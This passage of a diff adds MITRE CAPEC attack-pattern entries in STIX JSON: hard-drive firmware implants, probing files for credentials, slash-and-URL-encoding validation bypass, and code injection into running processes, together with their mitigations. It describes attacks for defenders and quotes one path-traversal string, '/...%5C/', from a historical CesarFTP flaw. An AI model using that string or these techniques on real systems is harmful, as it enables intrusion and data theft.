"https://www.schneier.com/blog/archives/2014/01/iratemonk_nsa_e.html" + } + ], + "id": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Altered Component Firmware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Modify Data" + ], + "Authentication": [ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Select Target: The adversary searches for a suitable target to attack, such as government and/or private industry organizations.

    2. Techniques
    Conduct reconnaissance to determine potential targets to exploit.

  2. Identify Components: After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.

    3. Techniques
    [Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.
    [Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack.

Experiment

  1. Optional: Create Payload: If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality.

Exploit

  1. Insert Firmware Altering Malware: Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component's firmware and drop the payload within the component's MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.

    2. Techniques
    The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.
    [Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target component's firmware", + "Advanced knowledge about Master Boot Records (MBR)", + "Advanced knowledge about tools used to insert firmware altering malware.", + "Advanced knowledge about component shipments to the target organization." + ], + "x_capec_resources_required": [ + "Manufacturer source code for hardware components.", + "Malware tools used to insert malware and payload onto target component.", + "Either remote or physical access to the target component." + ], + "x_capec_skills_required": { + "High": "Ability to intercept components in transit.", + "Low": "Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload", + "Medium": "Ability to create malicious payload to be executed from MBR." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage hardware components known to not be susceptible to these types of attacks.", + "id": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6dea11a-edca-4ae2-903f-37ba52f94b7d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement hardware RAID infrastructure.", + "id": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48c6816a-fb7e-4d07-bd6d-26b9d0326f98", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "spec_version": "2.1", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-639", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/639.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "description": "Data from Network Shared Drive", + "external_id": "T1039", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1039" + }, + { + "description": "Unsecured Credentials: Credentials in Files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Unsecured Credentials: Bash History", + "external_id": "T1552.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/003" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Unsecured Credentials: Group Policy Preferences", + "external_id": "T1552.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/006" + } + ], + "id": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Probe System Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", + "Adversaries may search network shares on computers they have compromised to find files of interest." + ], + "x_capec_prerequisites": [ + "An adversary has access to the file system of a system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.", + "id": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-639-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89b16bf7-ab18-4a61-a200-04e7a496d723", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e5df63e2-b26c-43a9-b8db-2987556afde6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d3b43e0-c4ff-4ab4-abd0-67d7f2037409", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6dd37d7b-5f87-4f59-b359-666ea8c64721", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6ea81ef-0f17-4947-9257-d78e4c27418e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14d09444-d3f4-4b5d-bd9c-ba056327a444", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78a37ef6-634a-4ba7-95e4-375cdbab4d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95070cd8-654a-4ca1-bbdb-e0d859a8c051", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.", + "external_references": [ + { + "external_id": "CAPEC-640", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/640.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Hijack Execution Flow: Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack Execution Flow: KernelCallbackTable", + "external_id": "T1574.013", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/013" + }, + { + "description": "Reflective Code Loading", + "external_id": "T1620", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1620" + } + ], + "id": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Inclusion of Code in Existing Process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target process: The adversary determines a process with sufficient privileges that they wish to include code into.

    2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Attempt to include simple code with known output: The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process.

Exploit

  1. Include arbitrary code into existing process: Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process's memory.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code." + ], + "x_capec_skills_required": { + "High": "Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown or malicious software from loading through using an allowlist policy.", + "id": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65e58781-40ea-404e-93cf-151d351ad305", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85d27ab2-ecd4-456d-b89a-b7c4e35486df", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "id": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4f55ef67-7b67-4bc1-970e-dd7c277df922", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.", + "id": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b00d13c-f642-4b89-8b0b-4f4bec45d3e4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.", + "id": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fae2dbb-a5ef-4e93-a719-15d38a7d1a44", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.", + "id": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--61327995-a6d3-4961-9d09-10e051ae76d1", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "id": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc1ad6dd-6038-4e55-89dd-eade5373a2f3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 